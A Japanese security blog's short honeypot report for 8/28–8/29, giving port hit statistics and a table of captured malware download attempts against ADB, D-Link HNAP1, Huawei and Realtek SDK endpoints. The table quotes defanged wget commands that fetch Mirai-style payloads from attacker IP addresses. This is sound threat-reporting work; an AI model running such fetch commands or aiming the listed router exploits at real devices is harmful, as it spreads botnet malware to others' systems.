sec-chick Blog

サイバーセキュリティブログ

ハニーポット簡易分析(21,22日目:8/28,8/29)

遅れましたが、Honeypotの簡易分析 8/28,8/29分の更新となります。

8/28

Honeytrap 3,418 件 (データ部 0byte以上)
※80ポートは除く

ポート	件数	割合	サービス
445	1,954	57.17%	SMB
3389	69	2.02%	RDP
1433	62	1.81%	Microsoft SQL Server
3128	52	1.52%	?
8080	46	1.35%	PROXY
52869	45	1.32%	D-Link, Realtek SDK
81	37	1.08%	?
8443	35	1.02%	?
5555	32	0.94%	Android Debug Bridge
4500	32	0.94%	IPSec NAT Traversal

8/29
Honeytrap 3,600 件 (データ部 0byte以上)
※80ポートは除く

ポート	件数	割合	サービス
445	2,057	57.14%	SMB
3389	151	4.19%	RDP
8080	70	1.94%	PROXY
1433	68	1.89%	Microsoft SQL Server
9600	62	1.72%	?
52869	46	1.28%	D-Link, Realtek SDK
5555	37	1.03%	Android Debug Bridge
1471	32	0.89%	?
81	24	0.67%	?
22	22	0.61%	SSH

<マルウェアダウンロード>

宛先ポート	リクエスト	ダウンロード	脆弱性
5555		wget hxxp://207[.]148[.]78[.]152/br VirusTotal	Android Debug Bridge に対する攻撃
		wget hxxp://185[.]162[.]130[.]187/adbs VirusTotal
		wget hxxp://27[.]102[.]115[.]44/adbs VirusTotal
8081	POST /HNAP1/	wget hxxp://148[.]72[.]176[.]78/ngynx VirusTotal	D-Link 社のルータへの攻撃(CVE-2015-2051)
		wget hxxp://176[.]32[.]33[.]171/kenjiro[.]mip VirusTotal
		wget hxxp://148[.]72[.]176[.]78/ken[.]sh VirusTotal
37215	POST /ctrlt/DeviceUpgrade_1	wget -g 209[.]141[.]33[.]86 VirusTotal	Huawei社のルータを狙った攻撃
		wget -g 31[.]220[.]43[.]190 VirusTotal
52869	POST /picdesc[.]xml	wget hxxp://185[.]10[.]68[.]127/rtbin VirusTotal	Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
		wget hxxp://80[.]211[.]112[.]150/mips VirusTotal
		wget hxxp://80[.]211[.]137[.]127/ntpd VirusTotal
		wget hxxp://159[.]65[.]232[.]56/xd[.]mips VirusTotal
		wget hxxp://80[.]211[.]55[.]29/SSG/mips[.]SSG VirusTotal
		wget hxxp://107[.]191[.]99[.]41/elf[.]mips VirusTotal
		wget hxxp://167[.]99[.]228[.]78/8mips8[.]mips VirusTotal
		wget hxxp://167[.]99[.]228[.]78/8mips8[.]mip VirusTotal
		wget hxxp://185[.]10[.]68[.]127/rtbin VirusTotal

他のハニーポッターの話を聞いてみると、やはりMirai関連のマルウェアが多くを占めています。まだまだ、継続して検知しそうです。

以上、簡易分析でした。